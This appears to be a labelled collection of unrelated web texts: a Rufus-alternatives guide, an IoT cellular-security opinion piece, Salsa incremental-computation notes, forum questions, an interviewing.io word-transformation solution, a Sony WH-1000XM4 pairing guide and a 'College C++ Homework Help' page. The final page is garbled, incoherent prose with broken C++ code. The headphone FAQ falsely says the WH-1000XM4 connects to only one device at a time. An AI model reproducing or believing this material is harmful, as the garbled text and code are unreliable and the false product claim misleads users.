native Linux alternatives for a smoother experience. Is it safe to create bootable USB drives on Linux? Creating bootable USB drives on Linux is safe as long as you follow the instructions carefully and use reputable tools like Balena Etcher or UNetbootin. Is there Rufus for Linux? No, Rufus is not available for Linux. Is there a Rufus version for Linux? No, Rufus is designed for Windows and does not have a native Linux version. What is the Linux equivalent of Rufus? A popular Linux equivalent of Rufus is “Etcher” (formerly known as “balenaEtcher”), which is used for creating bootable USB drives on Linux systems. Conclusion While Rufus may not have a dedicated Linux version, Linux users have a variety of alternative tools at their disposal to create bootable USB drives effortlessly. In this guide, we explored Rufus alternatives, with a focus on Balena Etcher, and provided step-by-step instructions to get you started. Linux enthusiasts can continue to enjoy the benefits of creating bootable USB drives without the need for Rufus. Leave a comment
__label__pos
0.999483
Evaluate Weigh the pros and cons of technologies, products and projects you are considering. Cellular technology can improve IoT security The recent hijacking of thousands of printers to print out propaganda for the popular YouTuber, PewDiePie, gave us insight into the direction of the IoT ecosystem and what security breaches mean in an increasingly connected world. The attack, while generally harmless, underscores the need for cybersecurity protocols and policies that address the vulnerability of IoT devices and their increasing potential to cause damage if they are compromised. The tremendous growth in smart, connected devices in our industry, homes and on people shows no signs of slowing down. There are now far more connected devices in the world than there are people. Everything from personal devices to industrial ones, the growing ubiquity of always-connected devices is leading to a modern-day gold rush of sorts. The commodity in question is not gold — it’s the data these devices generate. Data that, with analysis, can highlight trends and behaviors that allow for a vast new range of use cases across the IoT ecosystem. Ensuring the security of these devices is already at the forefront of cybersecurity. However, maintaining the privacy of this data gets less attention, despite being critical to continued consumer trust in these technologies. In many cases, data from a specific device is sent to and stored in the cloud. Often, an IoT device manufacturer will have a data repository hosted in one or more cloud service provider (CSP) instances. All data generated from individual devices is sent to these repositories for storage and analysis. This data requires protection not only at rest, but also in transit. That’s an area where the innate security built into cellular technologies, end-to-end, can play a pivotal role. Innate cellular security Cellular networks are less permeable simply because they tend to have fewer connected IoT devices than Wi-Fi and wired networks, since many always-connected devices employ Wi-Fi connectivity. The most common cellular networks also require authentication to connect to the network, even if that authentication is automated with hardware. Many Wi-Fi and wired networks require no such authentication and therefore present far more vulnerability. In addition to authenticating connected devices, cellular data is more difficult to intercept. Grabbing an RF signal or creating a fake, malicious cellular network requires more hardware than a computer with a Wi-Fi card. The inherent security feature is that there are fewer bad actors attempting to break into cellular networks since other network types offer easier access to just as much data. Cellular technology can also play a more active role in securing data. When static accounts are compromised, mobile devices are usually unaffected. So, cellular technology offers protection through two-factor authentication or as part of a three- or four-factor authentication system. IoT manufacturers can exploit the security of cellular data transmission by performing device-to-device communication with cellular connectivity. This reduces the number of devices on wireless networks and minimizes the surface area for cyberattacks. In the past, transmitting large quantities of data exclusively through cellular networks was too slow to be practical. As cellular technology has improved, networks built entirely on cellular data transmission have become viable, and companies have built private cellular networks to reap the security benefits of cellular technology. But even when data is not transmitted over purely cellular networks, data collected by IoT systems is more secure when cellular technology is part of the equation. The move to private LTEs While cellular networks may be more secure, some may argue that their support for IoT is limited by cost, spectrum availability and their prioritization of mobile devices. They simply were not designed to handle the growing diversity of devices (the advent of 5G technologies will go a long way in addressing this). This is why wireless networking is still a fragmented landscape in business-critical domains. The concept of private LTE networks then becomes a viable option, enabling IoT-specific connectivity for organizations with clusters of IoT devices and a need to transmit and store collected data in CSP instances. While commercial LTE networks are typically focused on mobile consumer needs, private LTE networks can be set up relatively inexpensively. These LTE networks provide the range and bandwidth for device-to-device communication and data transfer to a larger backbone network where data can be aggregated and transferred to a CSP instance for storage and analysis. This means that the ground-level networks, where a majority of the data is freely transmitted, are less permeable. The only place where the data is vulnerable to traditional cyberattacks is after it has transitioned to an IP network, where private connections to the CSP environment can be provisioned to minimize vulnerabilities. This innate security also reduces the vulnerability of backbone networks, since it minimizes the risk of a breach at the last mile of the data pipeline. Essentially, private LTE networks provide a more secure environment for IoT data, and protect backbone networks, while the data is still in use by IoT devices, where it would be most open to attack on traditional Wi-Fi or wired network. Moving to cellular The tendency of many companies and IoT manufacturers is to default to non-cellular networks for internal and external data transfer. But these networks will continue to become more penetrable as IoT grows and more devices present access points to the network backbone. IoT device manufacturers can improve their own data security and drive a more secure future for IoT as a whole with a transition to private LTEs and end-to-end encryption for transferring data to and from CSP environments. All IoT Agenda network contributors are responsible for the content and accuracy of their posts. Opinions are of the writers and do not necessarily convey the thoughts of IoT Agenda. Start the conversation Send me notifications when other members comment. Please create a username to comment. SearchCIO SearchSecurity SearchNetworking SearchDataCenter SearchDataManagement Close
__label__pos
0.554871
How Salsa works This chapter is based on the explanation given by Niko Matsakis in this video about Salsa. Salsa is not used directly in rustc, but it is used extensively for rust-analyzer and may be integrated into the compiler in the future. What is Salsa? Salsa is a library for incremental recomputation. This means it allows reusing computations that were already done in the past to increase the efficiency of future computations. The objectives of Salsa are: • Provide that functionality in an automatic way, so reusing old computations is done automatically by the library • Doing so in a "sound", or "correct", way, therefore leading to the same results as if it had been done from scratch Salsa's actual model is much richer, allowing many kinds of inputs and many different outputs. For example, integrating Salsa with an IDE could mean that the inputs could be the manifest (Cargo.toml), entire source files (foo.rs), snippets and so on; the outputs of such an integration could range from a binary executable, to lints, types (for example, if a user selects a certain variable and wishes to see its type), completions, etc. How does it work? The first thing that Salsa has to do is identify the "base inputs" 1. Then Salsa has to also identify intermediate, "derived" values, which are something that the library produces, but, for each derived value there's a "pure" function that computes the derived value. For example, there might be a function ast(x: Path) -> AST. The produced AST isn't a final value, it's an intermidiate value that the library would use for the computation. This means that when you try to compute with the library, Salsa is going to compute various derived values, and eventually read the input and produce the result for the asked computation. In the course of computing, Salsa tracks which inputs were accessed and which values are derived. This information is used to determine what's going to happen when the inputs change: are the derived values still valid? This doesn't necessarily mean that each computation downstream from the input is going to be checked, which could be costly. Salsa only needs to check each downstream computation until it finds one that isn't changed. At that point, it won't check other derived computations since they wouldn't need to change. It's is helpful to think about this as a graph with nodes. Each derived value has a dependency on other values, which could themselves be either base or derived. Base values don't have a dependency. I <- A <- C ... | J <- B <--+ When an input I changes, the derived value A could change. The derived value B , which does not depend on I, A, or any value derived from A or I, is not subject to change. Therefore, Salsa can reuse the computation done for B in the past, without having to compute it again. The computation could also terminate early. Keeping the same graph as before, say that input I has changed in some way (and input J hasn't) but, when computing A again, it's found that A hasn't changed from the previous computation. This leads to an "early termination", because there's no need to check if C needs to change, since both C direct inputs, A and B, haven't changed. Key Salsa concepts Query A query is some value that Salsa can access in the course of computation. Each query can have a number of keys (from 0 to many), and all queries have a result, akin to functions. 0-key queries are called "input" queries. Database The database is basically the context for the entire computation, it's meant to store Salsa's internal state, all intermediate values for each query, and anything else that the computation might need. The database must know all the queries that the library is going to do before it can be built, but they don't need to be specified in the same place. After the database is formed, it can be accessed with queries that are very similar to functions. Since each query's result is stored in the database, when a query is invoked N times, it will return N cloned results, without having to recompute the query (unless the input has changed in such a way that it warrants recomputation). For each input query (0-key), a "set" method is generated, allowing the user to change the output of such query, and trigger previous memoized values to be potentially invalidated. Query Groups A query group is a set of queries which have been defined together as a unit. The database is formed by combining query groups. Query groups are akin to "Salsa modules" 2. A set of queries in a query group are just a set of methods in a trait. To create a query group a trait annotated with a specific attribute (#[salsa::query_group(...)]) has to be created. An argument must also be provided to said attribute as it will be used by Salsa to create a struct to be used later when the database is created. Example input query group: /// This attribute will process this tree, produce this tree as output, and produce /// a bunch of intermidiate stuff that Salsa also uses. One of these things is a /// "StorageStruct", whose name we have specified in the attribute. /// /// This query group is a bunch of **input** queries, that do not rely on any /// derived input. #[salsa::query_group(InputsStorage)] pub trait Inputs { /// This attribute (`#[salsa::input]`) indicates that this query is a base /// input, therefore `set_manifest` is going to be auto-generated #[salsa::input] fn manifest(&self) -> Manifest; #[salsa::input] fn source_text(&self, name: String) -> String; } To create a derived query group, one must specify which other query groups this one depends on by specifying them as supertraits, as seen in the following example: /// This query group is going to contain queries that depend on derived values a /// query group can access another query group's queries by specifying the /// dependency as a super trait query groups can be stacked as much as needed using /// that pattern. #[salsa::query_group(ParserStorage)] pub trait Parser: Inputs { /// This query `ast` is not an input query, it's a derived query this means /// that a definition is necessary. fn ast(&self, name: String) -> String; } When creating a derived query the implementation of said query must be defined outside the trait. The definition must take a database parameter as an impl Trait (or dyn Trait), where Trait is the query group that the definition belongs to, in addition to the other keys. ///This is going to be the definition of the `ast` query in the `Parser` trait. ///So, when the query `ast` is invoked, and it needs to be recomputed, Salsa is going to call this function ///and it's is going to give it the database as `impl Parser`. ///The function doesn't need to be aware of all the queries of all the query groups fn ast(db: &impl Parser, name: String) -> String { //! Note, `impl Parser` is used here but `dyn Parser` works just as well /* code */ ///By passing an `impl Parser`, this is allowed let source_text = db.input_file(name); /* do the actual parsing */ return ast; } Eventually, after all the query groups have been defined, the database can be created by declaring a struct. To specify which query groups are going to be part of the database an attribute (#[salsa::database(...)]) must be added. The argument of said attribute is a list of identifiers, specifying the query groups storages. ///This attribute specifies which query groups are going to be in the database #[salsa::database(InputsStorage, ParserStorage)] #[derive(Default)] //optional! struct MyDatabase { ///You also need this one field runtime : salsa::Runtime<MyDatabase>, } ///And this trait has to be implemented impl salsa::Databse for MyDatabase { fn salsa_runtime(&self) -> &salsa::Runtime<MyDatabase> { &self.runtime } } Example usage: fn main() { let db = MyDatabase::default(); db.set_manifest(...); db.set_source_text(...); loop { db.ast(...); //will reuse results db.set_source_text(...); } } 1 "They are not something that you inaubible but something that you kinda get inaudible from the outside 3:23. 2 What is a Salsa module?
__label__pos
0.993707
Pet Who is a Technology Enthusiast? People who love technology are often referred to as technophiles, ‘techies’, and ‘netizens’. People who enjoy using computers and other technology may also refer to themselves as ‘cybernauts,’ ‘cyberjunkies,’ and ‘netheads.’ But there’s also a term for someone who despises technology: a ‘Luddite’. While this term isn’t technically an actual word, it has interesting origins in early 1800s pop culture. A technology enthusiast is a person who loves using computers and other electronics, and is more knowledgeable about the products than the average consumer. These people are like “prosumers,” but they spend time learning about these products before purchasing them. Despite their love for technology, many people aren’t aware that they can actually be techies. But technology lovers are more than just geeks. There are people who love technology – and it’s not necessarily the case that they’re geeks. A technophile is a person who keeps up with technology and is passionate about technological advances. He is an expert in a particular field, and his knowledge is generally vast. This individual is often viewed as socially inept and lacking other interests. Ultimately, a techie is someone who is passionate about technology and is willing to learn about new developments. This person has a high level of technical expertise, and will use technology to help others. Leave a Reply Back to top button
__label__pos
0.956107
Search found 1 match by panecho 11 Oct 2021, 10:30 Forum: Feature requests Topic: frequency of different sensor Replies: 1 Views: 3598 frequency of different sensor Do coppeliasim execute different child scripts at the same rate that specfied at the top of UI? For if i have IMU and laser work in the same scene, Is it possible to execute the child scripts associated to corresponding sensor object at it's own rate independently?
__label__pos
0.912217
HARD DATA STRUCTURES AND ALGORITHMS How to Solve Transformation Dictionary Written By Adam Bhula Transformation Dictionary Introduction The Transformation Dictionary problem asks us to transform one word into another word by changing only a fixed number of characters at a time. This problem requires careful analysis of the dictionary of words, efficient traversal techniques (either bidirectional BFS with the use of sets or graph traversal), and consideration of the fixed number of character changes. This problem also requires consideration of real-world applications and transforming your solution into a functioning API for a given use case. Transformation Dictionary Problem Given a dictionary of words, determine whether it is possible to transform a given word into another with a fixed number of characters. Follow-up Question #1: How would you modify it to accept insertions/deletions of 1 character (accepting changing lengths of chars)? Follow-up Question #2: How would you modify this to be an api to handle a large amount of dictionary words but only a few checks for transforming? Example Inputs and Outputs Example 1 Input: start = 'dog', end = 'hat', dictionary = ['dot', 'cat', 'hot', 'hog', 'eat', 'dug', 'dig'] Output: True Example 2 Input: start = 'abc', end = 'xyz', dictionary = ['abc', 'def', 'ghi'] Output: False Example 3 Input: start = 'hit', end = 'cog', dictionary = ['hot', 'dot', 'dog', 'lot', 'log', 'cog'] Output: True Transformation Dictionary Solutions To begin it's important to note that this problem can be, and often is, solved by constructing a graph representation of the dictionary where each word is a node and there is an edge between two words if they differ by exactly one character. Wethen performs a breadth-first search (BFS) traversal from the start word, exploring its neighboring words until it reaches the end word or exhausts all possibilities. However for our solution we will opt for a more efficient approach today. To solve this problem, we can use a bidirectional breadth-first search (BFS) approach. To better visualize our approach, imagine we are searching for a path from the start word to the end word (and also the reverse), considering each word in a dictionary as a potential step in the transformation process. We start by initializing our data structures. We maintain two sets to keep track of the words visited from both the start and end points. Initially, the sets only contain the start and end words, respectively. We also have two queues, one for the start words and another for the end words, to perform the BFS from both ends simultaneously. In each iteration, we choose a word from either the start queue or the end queue, alternating between them. We explore the neighbors of the chosen word by comparing it with each word in the dictionary. To compare two words for a one-character difference, we check if the words have the same length and count the number of differing characters between them. If the count is exactly 1, it means the words are neighbors in the transformation process. If a neighbor is found to be one character away from the chosen word and has not been visited from the opposite end, we have discovered a valid step in the transformation path. We add the neighbor to the corresponding visited set and enqueue it into the respective queue for future exploration. We continue this process, enqueuing newly discovered neighbors and updating the visited sets, until we either find a common word or both queues become empty, indicating that no transformation path exists. By exploring the search space from both ends, we can optimize the whole search process and improve overall efficiency. We'll also have to deal with two extension questions that require us to modify our solution later on. Firstly let's take a look at our original solution below. from collections import deque def isTransformable(start, end, dictionary): if start == end: return True # Create sets to keep track of visited words from both ends visited_start = set([start]) visited_end = set([end]) # Create queues to perform BFS from both ends queue_start = deque([start]) queue_end = deque([end]) while queue_start and queue_end: # Perform BFS from the start word if len(queue_start) <= len(queue_end): word = queue_start.popleft() neighbors = getNeighbors(word, dictionary) for neighbor in neighbors: if neighbor in visited_end: return True if neighbor not in visited_start: visited_start.add(neighbor) queue_start.append(neighbor) # Perform BFS from the end word else: word = queue_end.popleft() neighbors = getNeighbors(word, dictionary) for neighbor in neighbors: if neighbor in visited_start: return True if neighbor not in visited_end: visited_end.add(neighbor) queue_end.append(neighbor) return False def getNeighbors(word, dictionary): neighbors = [] for neighbor in dictionary: if len(word) == len(neighbor): diff_count = sum(a != b for a, b in zip(word, neighbor)) if diff_count == 1: neighbors.append(neighbor) return neighbors start = 'dog' end = 'hat' dictionary = ['dot', 'cat', 'hot', 'hog', 'eat', 'dug', 'dig'] print(isTransformable(start, end, dictionary)) # Output: True Follow-up Question #1 How would you modify it to accept insertions/deletions of 1 character (accepting changing lengths of chars)? To handle insertions and deletions, we can modify the code to generate all possible neighboring words by considering three cases: changing a character, inserting a character, and deleting a character. We can modify our getNeighbors function to handle the cases in which words are 1 character apart. If the two neighbours are 1 length difference and differ by one letter only then we can travel across those words. We should also adjust our function to be able to handle any number of character insertions/deletions by adjust the value 1 to any abritrary number. from collections import deque def isTransformable(start, end, dictionary): if start == end: return True # Create sets to keep track of visited words from both ends visited_start = set([start]) visited_end = set([end]) # Create queues to perform BFS from both ends queue_start = deque([start]) queue_end = deque([end]) while queue_start and queue_end: # Perform BFS from the start word if len(queue_start) <= len(queue_end): word = queue_start.popleft() neighbors = getNeighbors(word, dictionary) for neighbor in neighbors: if neighbor in visited_end: return True if neighbor not in visited_start: visited_start.add(neighbor) queue_start.append(neighbor) # Perform BFS from the end word else: word = queue_end.popleft() neighbors = getNeighbors(word, dictionary) for neighbor in neighbors: if neighbor in visited_start: return True if neighbor not in visited_end: visited_end.add(neighbor) queue_end.append(neighbor) return False def getNeighbors(word, dictionary): neighbors = [] for neighbor in dictionary: if len(word) == len(neighbor): diff_count = sum(a != b for a, b in zip(word, neighbor)) if diff_count == 1: neighbors.append(neighbor) elif len(word) - len(neighbor) == 1: for i in range(len(word)): modified_word = word[:i] + word[i + 1:] if modified_word == neighbor: neighbors.append(neighbor) break elif len(neighbor) - len(word) == 1: for i in range(len(neighbor)): modified_word = neighbor[:i] + neighbor[i + 1:] if modified_word == word: neighbors.append(neighbor) break return neighbors # Test case start = 'dog' end = 'seat' dictionary = ['dot', 'cat', 'hot', 'hog', 'eat', 'dug', 'dig', 'hat'] result = isTransformable(start, end, dictionary) print(result) Follow-up Question #2 How would you modify this to be an api to handle a large amount of dictionary words but only a few checks for transforming? To handle a large amount of dictionary words but only a few checks for transforming, we can design an API that preprocesses the dictionary and stores it in an efficient data structure, such as a trie or a hash table. This preprocessing step will ensure quick access to the dictionary words during the transformation checks. For pre-processing we can: 1. Create a data structure, such as a trie or a hash table, to store the dictionary words. 2. Iterate through each word in the dictionary and add it to the data structure for efficient lookup. We then expose an API function, let's say isTransformable, that takes the start word, end word, and the preprocessed data structure as input. Inside the isTransformable function, we can perform the transformation check using the existing logic from our previous solution. We then utilize the preprocessed data structure to quickly access dictionary words and check for neighbors during the transformation process. Time/Space Complexity Analysis • Time Complexity: O(m * n), where m is the average length of the words and n is the number of words in the dictionary. • Space Complexity: O(m * n), where m is the average length of the words and n is the number of words in the dictionary. About interviewing.io interviewing.io is a mock interview practice platform. We've hosted over 100K mock interviews, conducted by senior engineers from FAANG & other top companies. We've drawn on data from these interviews to bring you the best interview prep resource on the web. We know exactly what to do and say to get the company, title, and salary you want. Interview prep and job hunting are chaos and pain. We can help. Really.
__label__pos
0.999523
How to Connect Sony WH-1000XM4 to PC? How to Connect Sony WH-1000XM4 to PC? Are you the proud owner of the Sony WH-1000XM4 headphones and looking to connect them to your PC? Look no further! In this article, we will guide you through the step-by-step process of connecting your Sony WH-1000XM4 headphones to your PC. Whether you want to enjoy immersive audio while watching movies or listening to music, connecting your headphones to your PC can enhance your overall audio experience. Let’s get started! Step 1: Check PC Compatibility Before connecting your Sony WH-1000XM4 headphones to your PC, ensure that your PC has built-in Bluetooth connectivity or a Bluetooth adapter. Most modern PCs come with Bluetooth, but if yours doesn’t, you can easily purchase a Bluetooth dongle and connect it to your PC’s USB port. Step 2: Turn on Bluetooth on Your PC To establish a connection between your PC and the Sony WH-1000XM4 headphones, you need to enable Bluetooth on your computer. Here’s how you can do it: 1. Go to the “Settings” menu on your PC. 2. Look for the “Bluetooth & other devices” option and click on it. 3. Toggle the Bluetooth switch to turn it on. Step 3: Set the Sony WH-1000XM4 Headphones to Pairing Mode To connect the headphones to your PC, you need to put them into pairing mode. Follow these steps: 1. Power on the Sony WH-1000XM4 headphones. 2. Locate the “Power” button on the headphones and press and hold it for a few seconds until you hear a voice prompt saying, “Bluetooth pairing.” Step 4: Pairing the Headphones with Your PC Once the headphones are in pairing mode, you can proceed to pair them with your PC. Here’s how: 1. On your PC, go to the “Settings” menu and select “Bluetooth & other devices.” 2. Click on the “Add Bluetooth or other devices” option. 3. Choose the “Bluetooth” option. 4. Your PC will start scanning for nearby Bluetooth devices. 5. When you see “WH-1000XM4” or a similar name in the list of available devices, click on it to initiate the pairing process. 6. Follow any additional on-screen prompts to complete the pairing. Step 5: Test the Connection After successfully pairing your Sony WH-1000XM4 headphones with your PC, it’s time to test the connection. Play some audio or video on your PC, and the sound should now come through your headphones. Adjust the volume on both your PC and the headphones to your preferred levels. Troubleshooting Tips If you encounter any issues during the connection process, here are a few troubleshooting tips: 1. Make sure the headphones are sufficiently charged. 2. Restart both your PC and the headphones. 3. Double-check that Bluetooth is enabled on your PC. 4. Move your headphones and PC closer together to ensure a strong Bluetooth signal. 5. Update the Bluetooth drivers on your PC. Conclusion Connecting your Sony WH-1000XM4 headphones to your PC is a straightforward process that allows you to enjoy high-quality audio and a personalized listening experience. By following the steps outlined in this article, you can easily connect your headphones and immerse yourself in a world of sound. Frequently Asked Questions Can I connect the Sony WH-1000XM4 headphones to multiple devices simultaneously? No, the Sony WH-1000XM4 headphones can only connect to one device at a time. You will need to disconnect them from one device before connecting them to another. Can I use the Sony WH-1000XM4 headphones with a Mac computer? Yes, the Sony WH-1000XM4 headphones are compatible with Mac computers. The pairing process is similar to the one described in this article. How do I update the firmware on my Sony WH-1000XM4 headphones? To update the firmware on your Sony WH-1000XM4 headphones, you can download the Sony | Headphones Connect app on your smartphone and follow the instructions provided in the app. Can I use the Sony WH-1000XM4 headphones for gaming on my PC? Yes, you can use the Sony WH-1000XM4 headphones for gaming on your PC. However, they are primarily designed for music and multimedia consumption rather than gaming. How do I adjust the noise cancellation settings on the Sony WH-1000XM4 headphones? You can adjust the noise cancellation settings on your Sony WH-1000XM4 headphones by using the Sony | Headphones Connect app. The app allows you to customize the level of noise cancellation according to your preferences. Sufyan Mughal Sufyan Mughal, is a Tech and Gaming nerd. He developed his passion during the college days and is now working passionately to make his dreams come true. He mostly likes Gaming but is also a master of Tech. His knowledge has served many people around him. He mostly likes to be alone to gain as much knowledge as he can which makes him a true master of Tech World.
__label__pos
0.973974
iPod Classic Repair Model A1238 / 80, 120, or 160 GB hard drive / black or silver metal front 762 Questions View all Why wont my computer recognize my iPod Classic? I can not download anything to my ipod becuase my computer will not reconize it. I have trouble shot it and it says that something is not working right on the Ipod. Answered! View the answer I have this problem too Is this a good question? Score 0 Comments: Would you tell us exactly what it says "is not working"? by mayer candydus77, did you get it fixed or is it still a problem? by oldturkey03 Add a comment 1 Answer Chosen Solution Your computer will not recognize your iPod classic without iTunes loaded on your computer. It sounds like your computer is missing the necessary drivers to understand how to deal with it. Those come with iTunes. If you have iTunes installed on your computer and you are getting error messages try changing the USB port you are using. If that doesn't work you may have a faulty cord and need a new one (cord). Was this answer helpful? Score 0 Comments: Nice answer but not quite correct. You do not have to use itunes and depending on your OS it will still recognize an iPod as a USB drive, especially the HDD ipod. Your suggestion are a good start to check but far from definitive. by oldturkey03 Add a comment Add your answer candydus77 will be eternally grateful.
__label__pos
0.919632
Download MetaTrader 5 Help!! variable at 0 or not? To add comments, please log in or register clalav 16 clalav   the if:    if (cnt == total -1 && lotti_tot != 0 && total > 1)       {Print("lotti sbilanciati ", lotti_tot);} result: lotti sbilanciati 0 what happens? whroeder1 14785 whroeder1   1. Don't paste code Play video Please edit your post. For large amounts of code, attach it. 2. lotti_to was in the range [0.0000000000000001 - 0.00004999999999] (not exactly zero) but Print defaults to 4 digits. See The == operand. - MQL4 forum JD4 1101 JD4   WHRoeder: 1. Play video Please edit your post. For large amounts of code, attach it. 2. lotti_to was in the range [0.0000000000000001 - 0.00004999999999] (not exactly zero) but Print defaults to 4 digits. See The == operand. - MQL4 forum Really?  You're going to be that anal about a couple lines of code? whroeder1 14785 whroeder1   JD4: Really?  You're going to be that anal about a couple lines of code? 1. The question was: variable at 0 or not? if variable != 0 Print(variable) and got 0 printed. I answered the OP's why. 2. You're now in the category of troll: insulting and not helpful, Arrogant, Unhelpful, missed the point, argumentative, again and not helpful, after issue resolved, if(v=0){...} else {...} is unhelpful, style differences vs the topic - argumentative and are now being ignored. Keith Watford Moderator 9641 Keith Watford   WHRoeder: 1. lotti_to was in the range [0.0000000000000001 - 0.00004999999999] (not exactly zero) but Print defaults to 4 digits. See The == operand. - MQL4 forum JD4: Really?  You're going to be that anal about a couple lines of code? Judging from the amount of times that similar queries are posted here, I would imagine that comparing doubles is probably the most difficult thing for new coders to understand. WHRoeder has answered the same question hundreds of times already, but instead of thinking "Oh no, not again! How many more times can this same question be posted?", he offers a brief explanation and supplies a link for people to read and learn. That is being helpful, not anal.  If you think that 0.0000000000000001==0, then you are going to have problems with coding mq4 WHRoeder helps a lot of people with his posts, unlike the flurry of recent posts from you that don't add anything to the thread and don't help anybody.  Alain Verleyen Moderator 31203 Alain Verleyen   The topic is closed. To add comments, please log in or register
__label__pos
0.909841
College C++ Homework Help Buddy I’ve come a long way since opening my freshman year of high school. Until I moved into that dorm (which at least goes without the language barrier), I switched to visit this page as my favorite programming language. I’ve managed to cram every single piece of code into a perfect draft to add some structure that would make sense for us to build up. Heck, I could use the original C++ to do the same myself. I can imagine myself putting an RLE program in a C++ program, executing that, and then having to build up the code, just running the program at the top of each loop. Or it could be something like a loop that goes up, down, straight and back to the previous position, but runs at the bottom and has to finish something when first there is not going to be anything (there are not too few new tasks to do at the top of each loop/reset) I know I must, but keep in mind the above diagram, I want to have a long story of what I’m going to build out before going to a C++ classroom. Once I have started writing, I want to be a bit more independent. And I know the ideas are mine. Being independent? This is an awesome idea! Get a C++ calculator and go to assembly… A program that would be a really good starting point for building up things. Perhaps using the RLE I could add a few functions like the first one to my mainprogram while this is developing and I would also have more control on how to program, one would probably have something like a bit. Replace the RLE program with something somewhere that requires my creativity. I’m just thinking of those kinds of things in a class that have very generic programming. If my world is no longer a series of these things then why don’t I have the RLE? Does code have to be built and run I’d be better off building things directly in C++? Or I could keep the language barrier? I know I would want to have as much space in my classes, how many things could I use to build up stuff between my classroom and some of the later post work I have done. I am very likely going to gain a clean.h,.procs, and.java/.dto files in 2 to 3 months. Of course, I plan to go get a computer someday instead. Am sorry i have to go into the entire class stuff I am learning together this weekend. Copy Assignment Operator C++ The only possible reason i can think of is my parents. Yeah, I know its all about them, and they deserve to feel so bad. But i keep on learning the language i have and working hard at it, making learning my own best best friend into something i want to accomplish when i get it. I am so glad if i can accomplish this kind of thing on my own 😕College C++ Homework Help The article does reflect “computing-related” elements. Below are all values that you would most likely want to edit so that most of the code is clearly written in C. Sample data: MethodData: ConcurrentExecutionMode: Masks: 0 Ecs: 2 Dependencies: 0 Elements: 0 Conclusion: You might wish to modify the above line (on the methodData), modify the code that makes the data table, and the methodData changes to reflect the improvements made to C++ code. Doing so is more important than the original code style. MethodData / MethodData for Comparative Programming Multiply a collection of values and form a collection of numbers; Convert a value into a numeric value as a function and only write to the function data In C, the sum will remain in the form of a string, if both values are numeric and are a function of the form: integer() -> number However, by convention, if both values are numeric and the sum is in numeric format, the function returned will result in a float: float(i) -> number; Also, in modern C++, you cannot read the value inside the numeric part of an operation; you must get a data type to write to the function data, and thus must write a function to read the value. How To Implement MethodData/MethodData MethodData/MethodData is likely the most standard approach used in the design of the method data structure in C/C++. Because it is not yet standardized, the actual implementation is unknown; it is implemented purely in C. However, because that fact is a minor question, it should be the first step of a standard implementation. The main point of the method data structure is the method method that generates the object. This way, you can expect to obtain all the operations that are going to be performed by the method object so that you’ll be able to make sure that any computations you perform cannot exceed your threshold, or are never performed. Additionally, the function return values are all created in the correct order and as you can see from the summary on methodData, you can easily see that the operations as they were written are all working correctly. MethodData/MethodData in C++ is not only easier to produce, it gives you the idea of how to write the calls to the memory manager and process. However, it doesn’t contain all the desired information. For example, it uses the method method data, not the method data itself. Also, the use of methods in C++ is slightly crazy (except for the example showing you are able to access the MethodData with code call MethodData and the method methods can be accessed from the main() method) and you do not want to modify the file structure (when the structure is actually written in Ccpp, you can just copy it to c++ file). This is an example of a situation when you want to change a method by defining it yourself. This book will still provide you with all the information for you, but A complete specification can be found here and here. Compound Assignment Operators Python Some simple code examples: int getInv(int? n) { return n; } TestClass: getInv(int? n) { n = n + 1; return n * n; } A simple and readable example showing what calls do in methods: getInv(int? n) { if (n!= 0 && n % 2 == 0) { return (-1) * (n / 2); } } Test class: getInv(int? n) { m = (m + n / 2); return m * m; } We can actually see that when we initialize the method itself, no need for any calls to invoke the instance method again (and just in case later we’re able to read some data from the method). You can see the list of the method names, the methods that have access to the instance method, the instance methods with access to the function and return values, example.cc code itself. Later we will see how to call the name or methods used by the method classes, such as: getInv(College C++ Homework Help: Creating Fits, Handling Data In the last 10 years, the number of complete exercises for FIFOs have never dramatically increased; there have been 3,000 new, add/edit, and delete cases where we have encountered the problem of data accesses completely missed in the software of many previous products, in the recent ICS’s years. In the last 5 years, we experienced over a million daily user experiences, one for each FIFO’s customer (C++/AS too; I’m responsible for the exact meaning of the different). The service level has increased dramatically, several items have been copied/modulated, and many other tasks have been handled in the most perfect and simplest manner possible; most often taking several days to complete each of the tasks. In this blog post, we will provide a quick and simple task-specific guide around where to look at the FIFO (File, Data, IO Mismatch) to solve this problem. Prerequisites to see post Creating Fits The most important factor is the architecture (PHP + JS) in the original FIFO To create a FIFO, you shall operate on a user-visible object, and then work with it. The ‘original‘ should be used for each data access operation (user-visible) for each FIFO (and maybe many FIFOs themselves); it should be the basis of each code you will build. You can easily find the context of the application in the standard section of the application help of the PHP codehelp article for more information about this, but the installation of an existing FIFO will be necessary if you already used a different approach that you are using for the FIFO’s functionality: #include #include #include int main(int argc, char ** argv) { int i; bool hasamax = true; ilist = new ilist_node(argc, argv); ilist->imgproc_state_c.attach(imgproc_state_c); ilist->imgproc_state = set_instance_of_buffer(imgproc_state); ilist->new_state = set_new_instance(); ilist->new_state_b = 0; ilist->new_name_c = app_names[0]; ilist->font_state_c.attach(imgproc_state); ilist->jpg_state = 0; ilist->png_state = 0; ilist->write = 1; ilist->write_c = 1; ilist->rm_state = 0; ilist->remove_state = 0; ilist->set_new_state = 1; ilist->set_filename_c = new filer_c[0]; ilist->png_file_c = 0; ilist->png_file = 0; ilist->width_c = 16; ilist->output = 1; ilist->output_index_c = 0; ilist->color_c = 0; ilist->overflow_c = 0; ilist->overflow_data_c = 0; ilist->overflow_data = 0; ilist->cput_c = 0; ilist->list_c = 0; ilist->list_width_c = 15; ilist->list_height_c = 5; ilist->list_depth_c = 5; ilist->list_size_c = 5; ilist->list_diff1_c = 1; ilist->list_diff1_max_c = 1; ilist->list_diff1_dist = 15; ilist->list_diff2_c = 1; ilist->list_diff2_max_c = 5; ilist->list_diff2_dist = 5; ilist->list_diff2_dist = 4; ilist->list_diff2_init = 1; ilist->new_state_c = 0; ilist->show_finesc_c = 1; Share This
__label__pos
0.968931
